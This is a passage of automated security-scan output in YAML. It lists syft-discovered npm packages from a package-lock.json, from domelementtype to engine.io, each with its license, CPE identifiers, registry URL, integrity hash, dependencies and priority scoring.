*id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 04fd13748534548d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: domelementtype 2.3.0' title: domelementtype 2.3.0 description: 'Package discovered: domelementtype 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5df6e95fb09fce0c name: domelementtype version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-2-Clause spdxExpression: BSD-2-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/domelementtype@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz integrity: sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 21e3025ed99f3f28 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: domhandler 5.0.3' title: domhandler 5.0.3 description: 'Package discovered: domhandler 5.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 952037d890bc80f6 name: domhandler version: 5.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-2-Clause spdxExpression: BSD-2-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:domhandler:domhandler:5.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/domhandler@5.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz integrity: sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w== dependencies: domelementtype: ^2.3.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d6dff11bd10e354b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: domutils 3.2.2' title: domutils 3.2.2 description: 'Package discovered: domutils 3.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1b9db533b6297450 name: domutils version: 3.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-2-Clause spdxExpression: BSD-2-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:domutils:domutils:3.2.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/domutils@3.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/domutils/-/domutils-3.2.2.tgz integrity: sha512-6kZKyUajlDuqlHKVX1w7gyslj9MPIXzIFiz/rGu35uC1wMi+kMhQwGhl4lt9unC9Vb9INnY9Z3/ZA3+FhASLaw== dependencies: dom-serializer: ^2.0.0 domelementtype: ^2.3.0 domhandler: ^5.0.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4726026d0ba78a1e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: dunder-proto 1.0.1' title: dunder-proto 1.0.1 description: 'Package discovered: dunder-proto 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 23d9641db70f3051 name: dunder-proto version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:dunder-proto:dunder-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dunder-proto:dunder_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dunder_proto:dunder-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dunder_proto:dunder_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dunder:dunder-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:dunder:dunder_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/dunder-proto@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz integrity: sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A== dependencies: call-bind-apply-helpers: ^1.0.1 es-errors: ^1.3.0 gopd: ^1.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eae177c358a69822 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: duplexify 4.1.3' title: duplexify 4.1.3 description: 'Package discovered: duplexify 4.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 91c59a4a431b283f name: duplexify version: 4.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:duplexify:duplexify:4.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/duplexify@4.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/duplexify/-/duplexify-4.1.3.tgz integrity: sha512-M3BmBhwJRZsSx38lZyhE53Csddgzl5R7xGJNk7CVddZD6CcmwMCH8J+7AprIrQKH7TonKxaCjcv27Qmf+sQ+oA== dependencies: end-of-stream: ^1.4.1 inherits: ^2.0.3 readable-stream: ^3.1.1 stream-shift: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d3b8cfaa5ee0e8d1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: eastasianwidth 0.2.0' title: eastasianwidth 0.2.0 description: 'Package discovered: eastasianwidth 0.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e7e9dd6a07994e54 name: eastasianwidth version: 0.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:eastasianwidth:eastasianwidth:0.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/eastasianwidth@0.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cb63ab5ab6733afe ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ecdsa-sig-formatter 1.0.11' title: ecdsa-sig-formatter 1.0.11 description: 'Package discovered: ecdsa-sig-formatter 1.0.11' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4ed0ded14e893339 name: ecdsa-sig-formatter version: 1.0.11 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa-sig-formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa_sig_formatter:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa-sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa-sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa_sig:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa_sig:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa:ecdsa-sig-formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ecdsa:ecdsa_sig_formatter:1.0.11:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ecdsa-sig-formatter@1.0.11 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ== dependencies: safe-buffer: ^5.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3d3ef9aed82705e2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: editorconfig 1.0.7' title: editorconfig 1.0.7 description: 'Package discovered: editorconfig 1.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 122ede063714b5b3 name: editorconfig version: 1.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:editorconfig:editorconfig:1.0.7:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/editorconfig@1.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/editorconfig/-/editorconfig-1.0.7.tgz integrity: sha512-e0GOtq/aTQhVdNyDU9e02+wz9oDDM+SIOQxWME2QRjzRX5yyLAuHDE+0aE8vHb9XRC8XD37eO2u57+F09JqFhw== dependencies: '@one-ini/wasm': 0.1.1 commander: ^10.0.0 minimatch: ^9.0.1 semver: ^7.5.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9669afa378e5a35f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ee-first 1.1.1' title: ee-first 1.1.1 description: 'Package discovered: ee-first 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e40c9e2062507e8a name: ee-first version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ee-first:ee-first:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ee-first:ee_first:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ee_first:ee-first:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ee_first:ee_first:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ee:ee-first:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:ee:ee_first:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/ee-first@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz integrity: sha512-WMwm9LhRUo+WUaRN+vRuETqG89IgZphVSNkdFgeb6sS/E4OrDIN7t48CAewSHXc6C8lefD8KKfr5vY61brQlow== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 04d3ce47ab6baf5d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: electron-to-chromium 1.5.345' title: electron-to-chromium 1.5.345 description: 'Package discovered: electron-to-chromium 1.5.345' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dc02d9fca5801675 name: electron-to-chromium version: 1.5.345 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:electron-to-chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron-to-chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron_to_chromium:electron-to-chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron_to_chromium:electron_to_chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron-to:electron-to-chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron-to:electron_to_chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron_to:electron-to-chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron_to:electron_to_chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron:electron-to-chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:electron:electron_to_chromium:1.5.345:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/electron-to-chromium@1.5.345 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.345.tgz integrity: sha512-F9JXQGiMrz6yVNPI2qOVPvB9HzjH5cGzhs8oJ6A28V5L/YnzN/0KsuiibqF+F1Fd9qxFzD1BUnYSd8JfULxTwg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d03ffa53b9f68b04 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: emoji-regex 10.6.0' title: emoji-regex 10.6.0 description: 'Package discovered: emoji-regex 10.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 20a2cf9e55a512fb name: emoji-regex version: 10.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:emoji-regex:emoji-regex:10.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji-regex:emoji_regex:10.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji-regex:10.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji_regex:10.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji-regex:10.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji_regex:10.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/emoji-regex@10.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-10.6.0.tgz integrity: sha512-toUI84YS5YmxW219erniWD0CIVOo46xGKColeNQRgOzDorgBi1v4D71/OFzgD9GO2UGKIv1C3Sp8DAn0+j5w7A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 40ac25fe3302f6ab ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: emoji-regex 8.0.0' title: emoji-regex 8.0.0 description: 'Package discovered: emoji-regex 8.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6d4a27855f2a5940 name: emoji-regex version: 8.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:emoji-regex:emoji-regex:8.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji-regex:emoji_regex:8.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji-regex:8.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji_regex:8.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji-regex:8.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji_regex:8.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/emoji-regex@8.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2e49a0ba02ec88d9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: emoji-regex 9.2.2' title: emoji-regex 9.2.2 description: 'Package discovered: emoji-regex 9.2.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6d104925e5745212 name: emoji-regex version: 9.2.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:emoji-regex:emoji-regex:9.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji-regex:emoji_regex:9.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji-regex:9.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji_regex:emoji_regex:9.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji-regex:9.2.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:emoji:emoji_regex:9.2.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/emoji-regex@9.2.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: dd09559c2dcfbb7e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: encodeurl 2.0.0' title: encodeurl 2.0.0 description: 'Package discovered: encodeurl 2.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c88c25f6c6e59773 name: encodeurl version: 2.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:encodeurl:encodeurl:2.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/encodeurl@2.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz integrity: sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aefcf9a0415c9a67 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: end-of-stream 1.4.5' title: end-of-stream 1.4.5 description: 'Package discovered: end-of-stream 1.4.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2e1781643534e89c name: end-of-stream version: 1.4.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:end-of-stream:end-of-stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end-of-stream:end_of_stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end_of_stream:end-of-stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end_of_stream:end_of_stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end-of:end-of-stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end-of:end_of_stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end_of:end-of-stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end_of:end_of_stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end:end-of-stream:1.4.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:end:end_of_stream:1.4.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/end-of-stream@1.4.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg== dependencies: once: ^1.4.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8a726054b0a99ad6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: engine.io 6.6.7' title: engine.io 6.6.7 description: 'Package discovered: engine.io 6.6.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 560e37438ce30be1 name: engine.io version: 6.6.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:socket:engine.io:6.6.7:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/engine.io@6.6.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/engine.io/-/engine.io-6.6.7.tgz integrity: sha512-DgOngfDKM2EviOH3Mr9m7ks1q8roetLy/IMmYthAYzbpInMbYc/GS+fWFA3rl1gvwKVsQrVV61fo5emD1y3OJQ== dependencies: '@types/cors': ^2.8.12 '@types/node': '>=10.0.0' '@types/ws': ^8.5.12 accepts: ~1.3.4 base64id: 2.0.0 cookie: ~0.7.2 cors: ~2.8.5 debug: ~4.4.1 engine.io-parser: ~5.2.1 ws: ~8.18.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 